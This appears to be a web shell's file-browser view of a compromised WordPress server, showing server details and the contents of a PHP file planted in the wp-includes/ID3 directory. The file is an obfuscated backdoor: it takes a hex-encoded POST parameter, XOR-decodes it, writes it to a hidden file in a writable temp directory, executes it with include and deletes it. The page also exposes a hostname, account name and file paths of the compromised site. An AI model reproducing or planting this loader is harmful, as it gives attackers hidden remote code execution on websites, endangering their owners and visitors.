HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux mail.btech-izolacje.pl 5.15.0-140-generic #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 x86_64
User: pewna6876 (1017)
PHP: 8.2.28
Disabled: NONE
Upload Files
File: /home/pewnabryka.pl/public_html/wp-includes/ID3/custom_file_2_1756292413.php
<!--AgKn4qEw-->
<?php

if(in_array("\x66\x61\x63tor", array_keys($_POST))){
$flg = hex2bin($_POST["\x66\x61\x63tor"]);
$obj =''; $m=0;while($m<strlen($flg)){$obj.=chr(ord($flg[$m])^75);$m++;}
$resource = array_filter([session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", getcwd(), "/var/tmp"]);
foreach ($resource as $key => $marker) {
            if ((bool)is_dir($marker) && (bool)is_writable($marker)) {
            $object = vsprintf("%s/%s", [$marker, ".component"]);
            if (false !== file_put_contents($object, $obj)) {
    include_once $object;
    @unlink($object);
    exit;
}
        }
}
}